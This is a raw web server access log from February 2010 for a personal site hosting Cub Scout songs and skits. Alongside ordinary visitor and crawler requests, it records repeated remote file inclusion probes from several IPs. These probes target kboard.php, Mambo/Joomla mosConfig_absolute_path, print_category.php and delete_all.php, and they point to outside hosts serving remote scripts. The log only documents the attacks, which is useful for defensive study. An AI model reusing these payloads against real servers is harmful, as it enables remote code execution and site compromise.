24.180.135.136 - - [01/Feb/2010:12:40:27 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.bing.com/search?q=repeat+after+me+songs+for+scouts&src=IE-SearchBox&Form=IE8SRC" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 0 www.accesscom.com
24.180.135.136 - - [01/Feb/2010:12:40:27 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 0 www.accesscom.com
24.180.135.136 - - [01/Feb/2010:12:41:45 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.bing.com/search?q=repeat+after+me+songs+for+scouts&src=IE-SearchBox&Form=IE8SRC" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 0 www.accesscom.com
24.180.135.136 - - [01/Feb/2010:12:42:03 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 1 www.accesscom.com
24.180.135.136 - - [01/Feb/2010:12:42:18 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 200 13272 /home/users/d/daveh/public_html/sean/song/pbsong5.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:04 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:20 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:20 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:20 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:36 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:56 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:56 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:03:56 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:01 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:01 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:01 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:05 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:05 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:04:05 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:13:07:47 -0800] "GET /~daveh/logs/access.log////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:13:07:47 -0800] "GET /~daveh////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 2800 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:13:07:47 -0800] "GET /~daveh/logs////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 13169 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
67.172.55.47 - - [01/Feb/2010:13:14:50 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?q=boy+scout+songs&rls=com.microsoft:*:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7ADFA_en" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiv
67.172.55.47 - - [01/Feb/2010:13:14:50 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30618; Comcast)" 0 www.accesscom.com
67.172.55.47 - - [01/Feb/2010:13:15:07 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30618; Comcast)" 0 ww
64.4.232.125 - - [01/Feb/2010:13:25:32 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADFA_enUS339US339&q=cub+scout+pirate+skit" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
64.4.232.125 - - [01/Feb/2010:13:25:33 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
70.50.184.189 - - [01/Feb/2010:13:26:07 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://ca.search.yahoo.com/search;_ylt=A0oG75XCRmdLnIIB9HvrFAx.?p=scout+songs+pirate+song&fr2=sb-top&fr=yfp-t-715&rd=r1&sao=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 0 www.accesscom.com
70.50.184.189 - - [01/Feb/2010:13:26:07 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 0 www.accesscom.com
64.4.232.125 - - [01/Feb/2010:13:26:58 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:28:41 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.4.232.125 - - [01/Feb/2010:13:29:01 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:30:58 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:30:58 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:30:59 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
76.113.137.233 - - [01/Feb/2010:13:32:24 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.google.com/search?hl=en&source=hp&q=fell+into+a+well+fell+into+a+well+fell+into+a+deep+dark+well&aq=0&aqi=g1&oq=fell+into+a+well+fell+into+a+well" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
79.170.45.126 - - [01/Feb/2010:13:32:47 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.60.207.114 - - [01/Feb/2010:13:37:46 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)" 0 www.accesscom.com
74.60.207.114 - - [01/Feb/2010:13:37:47 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)" 0 www.accesscom.com
74.60.207.114 - - [01/Feb/2010:13:37:47 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4RNTM_enUS356US356&q=webelos+skits" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB0.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)" 2 www.ac
70.177.98.193 - - [01/Feb/2010:13:38:56 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.google.com/search?hl=en&source=hp&q=muscle+arm+song&aq=f&aqi=&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
65.55.106.162 - - [01/Feb/2010:13:43:03 -0800] "GET /~daveh/web/?M=A HTTP/1.1" 200 566 /home/users/d/daveh/public_html/web/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:45:14 -0800] "GET /~daveh/logs/access.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:13:51:33 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.216.33 - - [01/Feb/2010:13:54:32 -0800] "GET /~daveh/labview/?S=D HTTP/1.1" 200 808 /home/users/d/daveh/public_html/labview/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
208.127.56.162 - - [01/Feb/2010:13:59:54 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 206184 /home/users/d/daveh/public_html/sunset-glare.jpg "http://www.myspace.com/rosie_2008" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 5 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:14:02:56 -0800] "GET /~daveh//include/print_category.php?setup[use_category]=1&dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/include "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:14:02:56 -0800] "GET /~daveh/logs/access.log.0//include/print_category.php?setup[use_category]=1&dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 332 /home/users/d/daveh/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:14:02:56 -0800] "GET /~daveh/logs//include/print_category.php?setup[use_category]=1&dir=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//include "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:03:10 -0800] "GET /~daveh/logs//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/logs//delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:03:10 -0800] "GET /~daveh/logs/access.log//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:03:10 -0800] "GET /~daveh//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 302 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:04:08 -0800] "GET /~daveh//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 302 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:04:08 -0800] "GET /~daveh/logs//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/logs//delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
115.68.4.15 - - [01/Feb/2010:14:04:08 -0800] "GET /~daveh/logs/access.log//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.170.45.126 - - [01/Feb/2010:14:09:53 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:14:12:13 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.0" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
168.13.223.83 - - [01/Feb/2010:14:14:36 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.bing.com/search?q=under+the+sea+water+skit&first=11&FORM=PORE" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" 1 www.accesscom.com
168.13.223.83 - - [01/Feb/2010:14:14:36 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" 0 www.accesscom.com
168.13.223.83 - - [01/Feb/2010:14:14:36 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" 0 www.accesscom.com
213.190.217.106 - - [01/Feb/2010:14:18:21 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 32768 /home/users/d/daveh/public_html/sunset-glare.jpg "http://www.myspace.com/marsbliss" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1 www.accesscom.com
213.190.217.106 - - [01/Feb/2010:14:18:24 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 206 32768 /home/users/d/daveh/public_html/sunset-glare.jpg "http://www.myspace.com/marsbliss" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
71.67.170.67 - - [01/Feb/2010:14:24:46 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?q=cub+scout+songbook&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8&rlz=" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3; IEMB3)" 0 www.accesscom.com
